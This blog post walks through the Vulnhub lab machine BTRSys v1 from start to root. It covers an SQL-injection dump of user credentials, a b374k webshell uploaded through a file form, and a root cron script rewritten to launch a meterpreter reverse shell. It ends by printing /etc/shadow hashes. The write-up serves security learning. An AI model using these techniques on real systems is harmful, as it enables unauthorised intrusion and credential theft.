Vulnhub: Resimler: BTRSys v1

Wow two in one day! It must be a record… or the fact I am ill, either way here’s another write-up. This time I will be doing Resimler: BTRSys v1, It’s a fairly straight forward Boot2Root and for people familiar to these kinds of challenges follows a fairly standard flow.

So firstly let’s nmap it. We find:
21 ftp vsftpd 3.0.2
22 ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2
80 Apache httpd 2.4.7

The FTP has anonymous access but noting there. ok good my fave, webapp.

loading up the webapp in a browser proxied by burp there is very little, 2 pages neither with dynamic content and not much to play with! also it seems to be foreign, this makes it a bit tougher!

So I fire up nikto which gives:
/config.php – blank page
/login.php

I sqlmap login.php which gives the following:

Database: deneme
Table: user
[2 entries]
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| ID | Parola    | BabaAdi | AnneAdi | Ad_Soyad    | AnneMeslegi | BabaMeslegi | KardesSayisi | Kullanici_Adi    |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+
| 1  | asd123*** | ahmet   | nazli   | ismail kaya | lokantaci   | muhasebe    | 5            | ikaya@btrisk.com |
| 2  | asd123*** | mahmut  | gulsah  | can demir   | tuhafiyeci  | memur       | 8            | cdmir@btrisk.com |
+----+-----------+---------+---------+-------------+-------------+-------------+--------------+------------------+

It takes a while to work out what is what but eventualy can log in with the email address and the obvious password.

The page presented simply has a upload form. I upload test.txt and it says uploaded fine. So simply guess where it uploaded to which is /uploads/.
In burp I sent that upload request to repeater, dropped in my fave shell (b374k) and changed the name to shell.php. Checked the uploads folder and was greeted with a webshell.

From there I read config.php which contained:
$con=mysqli_connect(“localhost”,”root”,”toor”,”deneme”);
and /etc/passwd which gave some useernames but otherwise wan’t much help.

next as you would expect I uploaded and ran linuxprivescchecker.py which gave the following useful information:

Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) )
Ubuntu 14.04.1 LTS

[+] World Writable Files
    -rwxrwxrwx 1 root root 34 Aug 13  2014 /var/tmp/cleaner.py.swp
    -rwxrwxrwx 1 root root 23 Aug 13  2014 /var/log/cronlog
    --w--w--w- 1 root root 0 Oct  5  2017 /sys/fs/cgroup/systemd/cgroup.event_control
    -rw-rw-rw- 1 root root 0 Oct  5  2017 /sys/kernel/security/apparmor/.access
    -rwxrwxrwx 1 root root 96 Aug 13  2014 /lib/log/cleaner.py


    - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
    - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
    - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

Realizing /lib/log/cleaner.py was a cronjob run every 2 mins as root and was editable I did the following:
1) create meterpreter reverse shell.elf
2) upload shell.elf to /tmp
3) set up meterpreter listener on attack box
4) modify /lib/log/cleaner.py to “chown root:root /tmp/shell.elf”
5) modify /lib/log/cleaner.py to “chmod +x /tmp/shell.elf”
6) modify /lib/log/cleaner.py to “/tmp/shell.elf 2>/dev/null &”

I was then greeted to a root shell!

root@BTRsys1:~# whoami && uname -a && pwd
whoami && uname -a && pwd
root
Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
/root
root@BTRsys1:~# ls -la
ls -la
total 36
drwx------  4 root root 4096 May  2 19:02 .
drwxr-xr-x 21 root root 4096 Aug  9  2014 ..
-rw-------  1 root root 2634 May  5 22:42 .bash_history
drwx------  2 root root 4096 Apr 28 01:44 .cache
-rw-------  1 root root    8 May  5 22:41 .nano_history
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4096 Aug 10  2014 .ssh
-rw-------  1 root root 5778 May  2 19:02 .viminfo
lrwxrwxrwx  1 root root   27 Apr 28 05:27 apache.conf -> /etc/phpmyadmin/apache.conf
lrwxrwxrwx  1 root root   19 Apr 28 05:27 conf.d -> /etc/apache2/conf.d
lrwxrwxrwx  1 root root   19 Apr 28 05:27 conf.f -> /etc/apache2/conf.f
lrwxrwxrwx  1 root root   21 Apr 28 05:07 phpmyadmin -> /usr/share/phpmyadmin
lrwxrwxrwx  1 root root   35 Apr 28 05:28 phpmyadmin.conf -> /etc/apache2/conf.d/phpmyadmin.conf

what! no flag?! well I guess the /etc/shadow file will have to count as a flag. I havent been bothered to crack the hashes, feel free to though!

cat /etc/shadow
root:$6$AEZ/mND7$ju6KUwv0cZlGEiHjs1EBhO6nlE5zOGU4OwhUl/1n/EE9TI5W76rxS6OO2q7hMvhUL5.IsSL1VKyqBbf6.cCkd1:17284:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::
mail:*:16273:0:99999:7:::
news:*:16273:0:99999:7:::
uucp:*:16273:0:99999:7:::
proxy:*:16273:0:99999:7:::
www-data:*:16273:0:99999:7:::
backup:*:16273:0:99999:7:::
list:*:16273:0:99999:7:::
irc:*:16273:0:99999:7:::
gnats:*:16273:0:99999:7:::
nobody:*:16273:0:99999:7:::
libuuid:!:16273:0:99999:7:::
syslog:*:16273:0:99999:7:::
messagebus:*:16291:0:99999:7:::
sshd:*:16291:0:99999:7:::
ftp:*:16292:0:99999:7:::
lololol:!:16292:0:99999:7:::
ps-aux:$6$N8fO8B2w$ABHj.O2jTfIizBfrb0SpgN6VJLDujJ6o9wR4D0b4ZqqlfKQzW1M0xG0uTR4AZW77BFH0rsA2ZxnoGSMdwy3k00:16292:0:99999:7:::
maleus:$6$Y.Ev9AQx$IS.ikFcKj5.natBbOMMP3GiV9LJDjCQaHuvKoEeA1hPjhss8qLzjVPpuSnKysIF261sSnjOfoFjhpo.rO8qDg.:16292:0:99999:7:::
felux:$6$t0WWHdf0$9QYd6dc9XuZo.RwMRCdrzuTPTqaCJ47KAS7p1EitR2LVGJsOqjarTxD67WUhLQvmF3KOFIfgvN3rlw7cfU132.:16292:0:99999:7:::
Eagle11:$6$Pz9WUVEk$PPQQs334rlXCZRRY1w/uullgDaKeIMGNlzUXERsCl7zIrdulDtrcYD74t/mtw0yhqsJJQFXrZ08dpk0gEx0gX1:16292:0:99999:7:::
genphlux:$6$K2gip8vY$jcbwnoeCKqtu.9IkVbBNDJ3TAV0NcVSWgv2U3uYx1e942dcaD1NhxEpBklKAX1NnnrDCw6SU1Fw7vJ6tmOiCM/:16292:0:99999:7:::
usmc8892:$6$MlFBCUvT$YS7ZpyXavI6tGgYJW3fPFRbUlV2yhoHGir26minsRRBTTDf60NIwxi7PP3S8/vePYFBVVuSC0kfyBYeMnHnBO1:16292:0:99999:7:::
blawrg:$6$Pg7SOYWy$Ap9wmycvq0n2iR8CJNKcY/SBUrOqC4Dc8D6whHDnZNp8xqLCB/GF2Et4lHnhHehWkgObxSX5MZWofAc4QQSbj1:16292:0:99999:7:::
wytshadow:$6$Xw3TqkwY$O2Xx5JXO9DXSyqumRCBWa2fk0Z0glVUNty9nKkms4SlAKMtWwmHvNRHiIClPa4SGvCii0fCi5Xxg6gvoZrXhG0:16292:0:99999:7:::
vis1t0r:$6$nVShrZJb$ZAZ9nf4vzddUm1ISPO8gKgYweQopjc/Ta7jbEacYbDVOG1g8Y3LHwiJhU2NsDJljkn2Oc4xPJPeMpox5jSBHd0:16292:0:99999:7:::
mysql:!:17284:0:99999:7:::

Thanks ismailonderkaya for a fun Boot2Root, I’m looking forward to starting v2.

Leave a Reply